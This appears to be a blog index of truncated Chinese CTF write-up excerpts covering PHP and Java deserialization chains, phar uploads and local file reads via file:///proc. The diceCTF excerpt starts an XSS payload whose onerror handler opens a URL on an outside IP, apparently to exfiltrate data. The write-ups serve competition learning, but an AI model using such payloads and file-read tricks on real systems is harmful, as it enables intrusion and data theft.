DASctf x GFctf 十月挑战赛 wp 那几天在补作业和打数据安全比赛，拖了有点久，确实要反思一下自己了 ezpop 链子很好想 sorry:__destruct->show:__toString->secret_code::call->secret_code::show->sorry::__get->fine…

2022强网拟态线上预选赛复现（上） 前言 这个比赛当时和n1ctf冲了，所以两边同时看是比较花时间。比赛过程中也出现不少需要吸取经验的细节：比如说对题目的时间分配以及漏洞利用方法的总结。 总的来说学到很多... aurora当时的战况是pwn爷终于愿意帮忙做点pwn题了，@夏男人也过来帮忙出了不少题，但是web方面当时发现ezpop能够时间盲注后…

Tha1ctf 又称每日一题，欢迎其他师傅合作，靶场的访问目前仅限校内，外校师傅想来玩可以私我微信ST1021294680bing 序 先开局一张图 有人问我说去哪了，怎么不更新了，其实我是被拉去出水题了 为什么出题？那当然是为了活跃气氛和学习 为什么天天出题？自己看看大标题 行吧行吧不扯皮，咱们来看看前几次的每日一题 题目 除了一道docker集…

第五空间2022wp 收获颇丰，这次aurora把web给ak了，希望下次还能继往开来，勇攀高峰 5_web_BaliYun 签到题 /upload/ /www.zip 反序列化， 运行如下，保存为phar.jpg <?php class upload{ public $filename; } $a=new upload(); $a->…

wmctf2022 java 比较快的解法 此解法在r3那里拿了3血 发现那个url栏目可以file协议读文件，随后尝试file:///时可以直接枚举当前目录下的文件， 直接可以知道文件名，此外，发现file:///proc/self/cmdline可以直接读到tomcat绝对路径，这样一来找其webapps目录下就可以找到源码（刚好有个war包可…

蓝帽杯2022部分wp [蓝帽杯2022]fatfree 一开始很快找到原题：2020国赛babyserialize 然后找到一条可以phpinfo的rce链 <?php namespace DB{ abstract class Cursor implements \IteratorAggregate {} } namespace DB\SQ…

[dasctf7月]newer 建议参考jacko神：https://www.wolai.com/7MymbpgzhHWMdAoh2Ycb89 这个题很快发现cookie处可以反序列化,但是也很快发现没啥可以rce 当时想的是反序列化原生类，但是很快想起实现不了 最后看了jacko神的wP，原来是composer.json { "requ…

前言： 由于是大比赛还是开篇感慨两句。我对比赛题目的评价是赞不绝口。这次作为[纯情女色大学生]的队长，带领团队（基本上就我和2个web一个密码在做）完成了rcefile，babyweb，wp-um,polydiv，而ez_login,密码签到,ez_web差点出了，很是遗憾，再接再厉吧 [强网杯2022]rcefile 改content-type后…

[diceCTF2022]pastebin https://www.freebuf.com/articles/web/245097.html 就是说呢，img一个标签符也可以自己闭合 payload paste=<img src="x" onerror=window.open('http://8.129.42.1…

鹏城杯Ez_java 分析 看源码 关注到这，考察反序列化 @ResponseBody @PostMapping({"/read"}) public String read(@RequestParam(name = "data", required = true) String data) throws IO…